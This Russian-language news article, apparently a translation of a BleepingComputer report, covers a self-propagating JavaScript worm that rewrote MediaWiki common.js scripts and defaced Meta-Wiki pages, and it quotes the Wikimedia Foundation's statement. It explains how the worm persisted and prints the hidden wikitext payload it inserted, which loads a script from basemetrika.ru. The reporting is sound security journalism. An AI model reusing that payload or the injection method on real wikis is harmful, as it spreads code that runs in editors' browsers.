Обновление: ниже добавлено заявление Wikimedia Foundation и уточнение — вандализм затронул только Meta-Wiki.
Фонд Wikimedia сегодня столкнулся с инцидентом безопасности: самораспространяющийся JavaScript-червь начал изменять пользовательские скрипты и портить страницы Meta-Wiki.
Редакторы впервые сообщили о проблеме на странице обсуждения технических вопросов Wikipedia — Village Pump (technical). Пользователи заметили большое количество автоматических правок, которые добавляли скрытые скрипты и вандальные изменения на случайные страницы.
Инженеры Wikimedia временно ограничили редактирование во всех проектах, пока расследовали атаку и откатывали изменения.
JavaScript-червь
Согласно записи в трекере задач Wikimedia — Phabricator, инцидент, по-видимому, начался после выполнения вредоносного скрипта, размещённого в русской Википедии. В результате глобальный JavaScript-скрипт Wikipedia был изменён и в него был внедрён вредоносный код.
Вредоносный скрипт находился по адресу User:Ololoshka562/test.js
(Archive).
Он был впервые загружен в марте 2024 года и, как предполагается, связан
со скриптами, использовавшимися в предыдущих атаках на wiki-проекты.
Согласно анализу истории правок, проведённому BleepingComputer, считается, что скрипт впервые был выполнен сегодня из учётной записи сотрудника Wikimedia во время тестирования пользовательских скриптов. Пока неизвестно, был ли скрипт запущен намеренно, случайно загружен во время тестирования или сработал из-за взломанного аккаунта.
Анализ архивной версии test.js показал, что он распространяется сам:
внедряет вредоносные JavaScript-загрузчики в пользовательский файл
common.js и в глобальный скрипт Wikipedia MediaWiki:Common.js,
который используется всеми пользователями.
MediaWiki поддерживает как глобальные, так и пользовательские
JavaScript-файлы — например MediaWiki:Common.js и
User:<username>/common.js. Они выполняются в браузерах редакторов и
позволяют настраивать интерфейс wiki.
После того как test.js был загружен в браузере авторизованного
редактора, он пытался изменить два скрипта, используя текущую сессию и
права пользователя:
- Закрепление на уровне пользователя: скрипт пытался перезаписать
User:<username>/common.js, добавляя загрузчик, который автоматически загружалtest.jsкаждый раз, когда пользователь открывает wiki в авторизованном режиме. - Закрепление на уровне сайта: если у пользователя были
соответствующие права, скрипт также редактировал глобальный
MediaWiki:Common.js, чтобы вредоносный код выполнялся у всех редакторов.
Код для внедрения самораспространяющегося JavaScript-червя в скрипт
MediaWiki:Common.js
Источник: BleepingComputer
Если глобальный скрипт успешно изменялся, любой пользователь,
загружающий его, автоматически выполнял загрузчик. После этого процесс
повторялся — включая заражение его собственного common.js, как
показано ниже.
Заражённый скрипт common.js пользователя Wikimedia
Источник: BleepingComputer
Скрипт также содержал функциональность для редактирования случайных страниц. Он запрашивал случайную страницу через команду wiki Special:Random, после чего добавлял на неё изображение и скрытый JavaScript-загрузчик.
[[File:Woodpecker10.jpg|5000px]]
<span style="display:none">
[[#3cscript3egetscriptbasemetrikaruse413cscript3e|%3Cscript%3E$.getScript('//basemetrika.ru/s/e41')%3C/script%3E]]
</span>По анализу BleepingComputer, во время инцидента было изменено около
3996 страниц, а примерно 85 пользователей получили заменённые
файлы common.js. Сколько страниц было удалено — неизвестно.
Страницы, изменённые JavaScript-червём
Источник: BleepingComputer
По мере распространения червя инженеры временно ограничили редактирование во всех проектах, чтобы откатить вредоносные изменения и удалить ссылки на внедрённые скрипты.
Во время очистки сотрудники Wikimedia Foundation также откатили
common.js для множества пользователей. Эти изменённые страницы были
«подавлены» и больше не отображаются в истории правок.
На момент публикации вредоносный код уже удалён, и редактирование снова доступно.
Тем не менее Wikimedia пока не опубликовала подробный отчёт об инциденте, который объяснял бы, каким образом был выполнен «спящий» скрипт и насколько широко червь успел распространиться до его остановки.
Обновление 05.03.2026 19:45 ET: Фонд Wikimedia предоставил BleepingComputer следующее заявление. Согласно ему, вредоносный код был активен всего 23 минуты, и изменения коснулись только Meta-Wiki.
«Сегодня сотрудники Wikimedia Foundation проводили проверку безопасности пользовательского кода на Wikipedia. Во время этой проверки был активирован ранее загруженный код, который быстро был выявлен как вредоносный. В качестве меры предосторожности мы временно отключили возможность редактирования Wikipedia и других проектов Wikimedia, пока удаляли вредоносный код и проверяли безопасность сайта.
Код был активен в течение 23 минут. За это время он изменил и удалил контент на Meta-Wiki — сейчас он восстанавливается — однако постоянного ущерба это не нанесло. У нас нет доказательств того, что Wikipedia подверглась атаке или что в результате инцидента были скомпрометированы персональные данные пользователей.
Мы разрабатываем дополнительные меры безопасности, чтобы снизить риск повторения подобных инцидентов. Обновления публикуются в открытом журнале инцидентов Foundation.»
Теги: security, javascript, wikipedia